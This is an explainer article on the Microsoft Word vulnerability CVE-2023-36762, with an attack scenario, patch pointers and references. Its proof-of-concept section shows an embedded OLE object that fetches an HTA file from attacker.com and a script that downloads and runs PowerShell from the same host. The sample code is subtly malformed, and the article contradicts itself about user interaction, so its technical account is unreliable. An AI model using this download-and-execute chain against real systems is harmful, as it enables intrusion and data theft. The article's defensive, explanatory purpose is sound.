CVE-2023-36762 - Unpacking the Microsoft Word Remote Code Execution Vulnerability

Microsoft Word is one of the most widely-used document editors, trusted by individuals, businesses, and governments. But sometimes, even the most popular software isn’t immune to flaws—a fact made clear by CVE-2023-36762, a critical remote code execution (RCE) vulnerability discovered in Microsoft Word. If you haven't heard of this issue, or you're wondering just how bad it can get, this article unpacks the problem in plain English, with code samples, references, and even details on how this vulnerability is exploited.

What is CVE-2023-36762?

CVE-2023-36762 is a security vulnerability found in Microsoft Word that allows an attacker to run code on a victim’s computer, simply by getting them to open a malicious document. That means an attacker can potentially install malware, steal sensitive files, or take complete control of your system—all it takes is clicking "Open."

Why is it so dangerous?

- No User Interaction Required: The attack can happen even if you only preview the document in the Reading Pane.
- Works Across Multiple Versions: Affects several versions of Microsoft Office, both on-premises and via Microsoft 365 (formerly Office 365).

How does the Vulnerability Work?

Microsoft Word loads embedded OLE (Object Linking and Embedding) objects when a document is opened or previewed. In the case of CVE-2023-36762, a specially-crafted object can force Word to download and execute a remote payload—without proper security checks.

The Proof-of-Concept (PoC) Code

Attackers often use .docx files with embedded objects pointing to external resources. Here’s a simple demonstration using mshta.exe (Microsoft HTML Application Host, a common tool abused for code execution):

<!-- Malicious OLE Object Embedded in Word Document -->
<o:OLEObject Type="Embed" ProgID="htmlfile" ShapeID="_x000_i1025"
    DrawAspect="Content" ObjectID="_1567222121"
    r:id="rId1"
    UpdateMode="Always">
  <o:Link Src="http://attacker.com/payload.hta"/>;
</o:OLEObject>

If a user opens the document, Word reaches out to http://attacker.com/payload.hta and executes whatever it finds there.

Malicious payload example (payload.hta)

<script>
  var wsh = new ActiveXObject("WScript.Shell");
  wsh.Run("cmd.exe /c powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/evil.ps1';)\"");
</script>

*This script would download and run a PowerShell script automatically!*

Exploit Details

Attackers send emails with booby-trapped Word docs, typically disguised as invoices, contracts, or shipping notices. All it takes is one click or even a simple mouse-over in the Outlook preview pane.

Example Attack Scenario

> "John in Accounting opens a Word file named Quarterly_Report.docx from a partner. The file pulls in a remote .hta payload, giving the attacker access to all John's company files—no security warning pops up."

Protecting Your Computers

Microsoft released patches in September 2023. You can find the official advisory and patch details here:

- Microsoft Advisory for CVE-2023-36762
- NIST NVD Entry

Conclusion

CVE-2023-36762 is a sobering reminder that even familiar tools can be dangerous if not updated and used wisely. This vulnerability made it easy for attackers to hijack systems with weaponized Word documents. Stay up to date, stay cautious, and always double-check what you’re clicking on.

References & Further Reading

- Microsoft Security Guide: CVE-2023-36762
- NIST NVD: CVE-2023-36762
- Huntress: Dissecting a Recent Word RCE Exploit
- Microsoft: Office OLE Security Settings

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC